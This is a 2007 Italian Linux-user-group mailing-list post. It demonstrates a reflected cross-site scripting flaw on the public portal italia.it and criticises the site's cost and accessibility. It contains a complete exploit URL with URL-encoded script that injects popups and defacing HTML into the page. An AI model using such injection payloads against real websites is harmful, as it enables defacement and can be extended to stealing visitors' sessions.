[MontelLUG] Italia.it vulnerabile... che tristezza
Alberto Zanatta
admin a freelabs.it
Dom 25 Feb 2007 19:03:37 CET
Provate a vedere cosa si può combinare... Con un po' di javascript, poi...
*http://tinyurl.com/28llvl
*Codice:
http://www.italia.it/it/scout/accs/5,it,SCH1/r,RGN8it,selectedEntry,home/result.html?ref=5&jse=0&sbe=0&startRegion=
Italia&rls_chd=false&clk=http%3A%2F%2Fwww.italia.it%2Fit%2Fguide%2F5%2Cit%2CSCH1%2FobjectId%2CRGN8it%2C
season%2Cat1%2CselectedEntry%2Chome%2Fhome.html&rlsq=bug+del+protpoorpptotot&ac=&an=%22%3E%3Cscript+
language%3D%22javascript%22%3Efunction+popup%28%29+%7Balert%28%22Per+45+milioni+ve+lo+facevo+mooolto+meglio
+il+sito...%22%29%3B%7Dfunction+PopupCentrata%28%29+%7B+var+w+%3D+970%3Bvar+h+%3D+760%3Bvar+l+%3D+
Math.floor%28%28screen.width-w%29%2F2%29%3Bvar+t+%3D+Math.floor%28%28screen.height-h%29%2F2%29%3Bwindow
.open%28%22http%3A%2F%2Fwww.google.it%2Findex.php%22%2C%22%22%2C%22width%3D%22+%2B+w+%2B+%22%2
Cheight%3D%22+%2B+h+%2B%22%2Ctop%3D%22+%2B+t+%2B+%22%2Cleft%3D%22+%2B+l%29%3B%7D%3C%2Fscript
%3E%3Ca+href%3D%22http%3A%2F%2Fwww.google.it%22+onmouseover%3D%22popup%28%29%22%3EClicca+qui%3C%
2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22javascript%3APopupCentrata%28%29%22%3EE+QUI%3C%2Fa%3E%3Ch1
%3EGuarda+che+bel+BUG+ITALIA%21%21%21%3Cbr%3E%3Cbr%3E%3Ctable+style%3D%22color%3Ared%3Bbackground-
color%3Ablack%3B%22+width%3D%22600%22+height%3D%221000%22%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3Cbr%3EC
IAOACICAIACSIADIDSADIASASD+C%3Cbr%3E+DASHSADHASDHDASHADSHADSHAS%3Cbr%3E%3Cbr%3E%3Cbr%3ED
ASJSDAJDASASD%3Cbr%3ECIAO%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Chr+width%3D%22100000%22+size
%3D%221020202%22%3E&mf_chd=1&mf=ACC%24OTHERFACIL%40N&mf=ACC%24OTHERFACIL%40I&accsearch.x=16&accsearch.y=11
Credo che 45 milioni per un portale con accessibilità 0, grafica veramente
pessima (il testo è brutto da vedere in quanto "seghettato"), tutto il
portale è in flash...
Mah.
Mi davano 500€ e ne facevo uno migliore.
Comunque è tutto spiegato qua:
http://www.freelabs.it/article.php?story=Italia.itVulnerabile
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://mail.montellug.it/pipermail/montellug/attachments/20070225/9d3ea06c/attachment.html>
More information about the montellug
mailing list